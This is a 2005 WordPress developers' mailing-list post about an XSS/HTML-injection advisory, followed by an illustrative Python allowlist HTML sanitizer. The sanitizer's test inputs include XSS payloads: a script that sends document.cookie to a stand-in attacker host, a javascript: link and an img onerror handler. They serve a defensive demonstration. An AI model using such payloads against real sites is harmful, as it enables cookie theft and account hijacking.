[wp-hackers] Security Vulnerability found

Brian Dupuis wordpress at coldforged.org
Wed Apr 13 14:00:50 GMT 2005


Eli Sarver wrote:

>Has this been addressed?
>
>http://soulblack.com.ar/repo/papers/wordpress_advisory.txt
>
>Title: WordPress XSS and HTML injection
>Vulnerability discovery: SoulBlack - Security Research -
>http://soulblack.com.ar
>Date: 12/04/2005
>Severity: Medium. Users can obtain cookies of other users and deface the website
>Affected version: <= 1.5
>
So, blog authors can insert HTML into their titles and posts?
Admittedly, perhaps some stripping of particular elements (e.g.
"script") could/should be done, but the arbitrary conversion of _all_ tags
is a bit daft. Look out for those "<em>" tags!
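The middle ground between the two positions in this thread (strip only "script" versus entity-encode every tag) is an allowlist sanitizer: keep a short list of harmless elements such as em and strong, drop script/style with their contents, drop every attribute that is not explicitly allowed (which removes on* event handlers and style), reject javascript: URLs in href, and entity-encode anything else so it renders as literal text. The example below is added here for illustration; it is not WordPress code and not from the advisory, it is written in Python rather than PHP, and the allowlist policy, the safe-scheme list and the sample inputs in the comments are assumptions chosen for the demonstration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed policy (not WordPress's own): elements a blog author may keep,
# each with the attributes that survive on it. Everything else is encoded.
ALLOWED = {
    "em": set(), "strong": set(), "p": set(), "br": set(),
    "code": set(), "blockquote": set(), "a": {"href", "title"},
}
VOID = {"br"}                     # never pushed on the open-tag stack
DROP_CONTENT = {"script", "style"}  # element and its text are removed
SAFE_SCHEMES = {"http", "https", "mailto", ""}  # "" = relative URL


def _safe_url(value):
    """Reject javascript:/data:/vbscript: and anything carrying control
    characters, which browsers strip ('java\\tscript:' is still javascript:)."""
    value = value.strip()
    if any(ord(c) < 32 or ord(c) == 127 for c in value):
        return False
    return urlparse(value).scheme.lower() in SAFE_SCHEMES


class Sanitizer(HTMLParser):
    def __init__(self):
        # convert_charrefs=True: '&lt;' arrives as '<' in handle_data and is
        # re-encoded there, so stored entities cannot smuggle markup through.
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []
        self.skipping = False

    def handle_starttag(self, tag, attrs):
        if self.skipping:
            return
        if tag in DROP_CONTENT:
            self.skipping = True
            return
        if tag not in ALLOWED:
            # Unknown element, e.g. <img onerror=...>: show it as text.
            self.out.append(html.escape(self.get_starttag_text()))
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED[tag]:
                continue          # drops onclick=, onmouseover=, style=, ...
            value = value or ""
            if name == "href" and not _safe_url(value):
                continue          # drops href="javascript:..."
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID:
            self.open_tags.append(tag)

    def handle_startendtag(self, tag, attrs):
        before = len(self.open_tags)
        self.handle_starttag(tag, attrs)
        if len(self.open_tags) > before:   # e.g. <em/>: close it at once
            self.out.append(f"</{self.open_tags.pop()}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.skipping = False
            return
        if self.skipping:
            return
        if tag in self.open_tags:
            # Close anything opened after it so the output stays balanced.
            while self.open_tags:
                t = self.open_tags.pop()
                self.out.append(f"</{t}>")
                if t == tag:
                    break
        elif tag not in ALLOWED:
            self.out.append(html.escape(f"</{tag}>"))

    def handle_data(self, data):
        if not self.skipping:
            self.out.append(html.escape(data, quote=False))

    def result(self):
        while self.open_tags:             # close tags the author left open
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize(fragment):
    """Return a safe HTML fragment for an author-supplied title or post body."""
    s = Sanitizer()
    s.feed(fragment)
    s.close()
    return s.result()


if __name__ == "__main__":
    # Constructed sample inputs, in the spirit of the advisory's cookie theft.
    for sample in (
        "<em>emphasis survives</em>",
        '<script>document.location="http://attacker/?"+document.cookie</script>',
        '<a href="javascript:alert(1)" onclick="alert(2)">link</a>',
        "<img src=x onerror=alert(1)>",
    ):
        print(repr(sanitize(sample)))
```

Note that the sanitizer runs on the way *in* (at save time) or on the way *out* (at render time); running it at render time is the safer default, because content that reached the database by another path still gets filtered. The allowlist is deliberately small: widening it with elements such as iframe or object, or with attributes such as style, reopens injection paths that this policy closes.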


